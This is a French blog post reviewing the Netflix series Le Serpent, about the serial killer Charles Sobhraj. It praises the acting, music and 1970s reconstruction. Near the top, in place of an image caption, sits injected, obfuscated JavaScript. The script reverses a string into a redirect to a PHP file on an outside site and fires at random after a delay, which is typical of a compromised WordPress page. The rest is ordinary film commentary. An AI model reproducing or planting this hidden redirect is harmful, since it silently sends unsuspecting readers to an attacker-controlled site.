La série Le Serpent

La série Le Serpent, actuellement diffusée sur Netflix est vraiment excellente.

La série le serpent
$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(«  »).reverse().join(«  »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tour de la série le serpent. » class= »wp-image-1141″/>


La série Le Serpent est composée de seulement 8 épisodes ce qui est largement suffisant pour nous captiver.
Elle est inspirée par l’histoire sordide mais fascinante du tueur en série Charles Sobhraj, et se déroule dans les années 70 principalement à Bangkok.

Je ne connaissais absolument pas l’histoire de ce couple qui se cachait sous l’identité d’Alain et Monique Gautier.

C’est magnifiquement filmé, les paysages font rêver, et la musique est entrainante. On y entend Dutronc, Aznavour et Gainsbourg. Tahar Rahim, que je connais mal (Je n’ai jamais vu le film Le Prophète) et qui interprète Charles Sobhraj, est grandiose. Il a un charisme incroyable, un charme redoutable qui l’aide à approcher ses proies.

Le Serpent



Il y avait le risque d’être fasciné par le tueur. Ce sera certainement ainsi que certains le percevront, peut-être les mêmes qui vouent un culte au personnage de Tony Montana dans Scarface.

Mais les crimes restent des crimes ignobles et lâches. Ces jeunes hippies se font empoisonner et assassiner pour seulement un peu d’argent. Leur voyage se termine en cauchemar. C’est souvent minable, pitoyable et dégueulasse.

Je trouve que la série ne ménage pas le tueur. Et c’était ce qu’il y avait de mieux à faire pour ne pas glorifier ses meurtres.

Je suis aussi totalement bluffé par le résultat « graphique » et par l’intelligence de la mise en scène. La reconstitution de l’ambiance des années 70 est une véritable prouesse. Et de nombreuses séquences sont flippantes que ça en devient insoutenable !

Monique et Alain Gautier